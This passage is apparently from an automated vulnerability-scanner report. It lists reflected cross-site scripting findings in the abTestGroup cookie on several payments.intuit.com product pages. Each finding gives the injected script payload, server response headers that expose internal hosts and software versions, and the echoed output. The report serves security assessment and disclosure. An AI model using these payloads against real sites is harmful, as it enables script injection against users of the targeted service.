Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:56 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=HXfFyAOh1s4XIQ1r8jFuSw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:57 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9614F610A0805192AA117E3C413B840
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145461

...[SNIP]...
<br />
A/B Test Group: T16e3cdf<script>alert(1)</script>457e3b04e25<br />
...[SNIP]...

2.158. http://payments.intuit.com/products/internet-merchant-accounts.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/internet-merchant-accounts.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 94dbf<script>alert(1)</script>468c7862810 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:40 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=pPmRhbq2vNWdPqB79vHiqw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:41 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F3CC20A0805192AA117E3B7B31296
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116390

...[SNIP]...
<br />
A/B Test Group: T1694dbf<script>alert(1)</script>468c7862810<br />
...[SNIP]...

2.159. http://payments.intuit.com/products/internet-merchant-accounts.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/internet-merchant-accounts.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32b2"><script>alert(1)</script>eca551a06e2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:49 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=tkQDatAtu3SKEK4O6mqLXQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:50 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D89780A0805192AA117E36458950A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116404

...[SNIP]...
<input id="testGroup" value="T16a32b2"><script>alert(1)</script>eca551a06e2" type="hidden" />
...[SNIP]...

2.160. http://payments.intuit.com/products/online-credit-card-processing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/online-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e40f2"><script>alert(1)</script>2ecf5ecc899 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:27 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Pbm4EsFX7ItyQ6uhSFsQPg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:28 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F07690A0805192AA117E39E651AF3
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116192

...[SNIP]...
<input id="testGroup" value="T16e40f2"><script>alert(1)</script>2ecf5ecc899" type="hidden" />
...[SNIP]...

2.161. http://payments.intuit.com/products/online-credit-card-processing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/online-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ff5ed<script>alert(1)</script>1c8e4d0787a was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=dCkX6oL--hpQ36+ZvLN4zA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960C52D0A0805192AA117E344932928
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116179

...[SNIP]...
<br />
A/B Test Group: T16ff5ed<script>alert(1)</script>1c8e4d0787a<br />
...[SNIP]...

2.162. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-credit-card-processing-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 6fb36<script>alert(1)</script>4c918b363ab was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:41 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=5+RKX6vGqEPDQ0N1aaWgzA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:42 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96117780A0805192AA117E3CB6FBF98
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140388

...[SNIP]...
<br />
A/B Test Group: T166fb36<script>alert(1)</script>4c918b363ab<br />
...[SNIP]...

2.163. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-credit-card-processing-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66866"><script>alert(1)</script>32afa1f3f6c was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=zRzKl+MSVxM+3HdgcANKFg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:04 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F946E0A0805192AA117E332CBAC17
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140401

...[SNIP]...
<input id="testGroup" value="T1666866"><script>alert(1)</script>32afa1f3f6c" type="hidden" />
...[SNIP]...

2.164. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d3b88<script>alert(1)</script>6e2a002a14f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:25 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=L-zz2dNUext+4Q-KcuN0bQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:26 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FEAFE0A0805192AA117E37B6CBEAF
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100552

...[SNIP]...
<br />
A/B Test Group: T16d3b88<script>alert(1)</script>6e2a002a14f<br />
...[SNIP]...

2.165. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19d02"><script>alert(1)</script>94241c27c76 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:36 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=yWSAZf5c4xcytMMezhM63w**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:37 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E404B0A0805192AA117E37069D512
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100565

...[SNIP]...
<input id="testGroup" value="T1619d02"><script>alert(1)</script>94241c27c76" type="hidden" />
...[SNIP]...

2.166. http://payments.intuit.com/products/quickbooks-payment-solutions/ [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d5f4"><script>alert(1)</script>87efd050621 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:25 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=n19gPeGfvwyyWV29gPb8Ng**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:26 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D2E3B0A0805192AA117E3AF226B64
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100565

...[SNIP]...
<input id="testGroup" value="T168d5f4"><script>alert(1)</script>87efd050621" type="hidden" />
...[SNIP]...

2.167. http://payments.intuit.com/products/quickbooks-payment-solutions/ [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 62983<script>alert(1)</script>3ae0052e269 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:35 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=7oJ44ylVUt+Li-Z7PXRP7Q**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:36 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F28BD0A0805192AA117E37695A7D1
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100552

...[SNIP]...
<br />
A/B Test Group: T1662983<script>alert(1)</script>3ae0052e269<br />
...[SNIP]...

2.168. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/ach.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 666da<script>alert(1)</script>b41e58df354 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:50 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Z1BCpO0dBLLog6V8f1FTVA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:51 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D961387A0A0805192AA117E3832F3F96
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145463

...[SNIP]...
<br />
A/B Test Group: T16666da<script>alert(1)</script>b41e58df354<br />
...[SNIP]...

2.169. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/ach.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d083f"><script>alert(1)</script>9f3ce87ff72 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=PqWIbcT8+tXNj3N5AL2viQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FB2030A0805192AA117E3D6C05D05
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145475

...[SNIP]...
<input id="testGroup" value="T16d083f"><script>alert(1)</script>9f3ce87ff72" type="hidden" />
...[SNIP]...

2.170. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 237a8"><script>alert(1)</script>3c9a92fa8e4 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response (redirected)

HTTP/1.1 200 OK
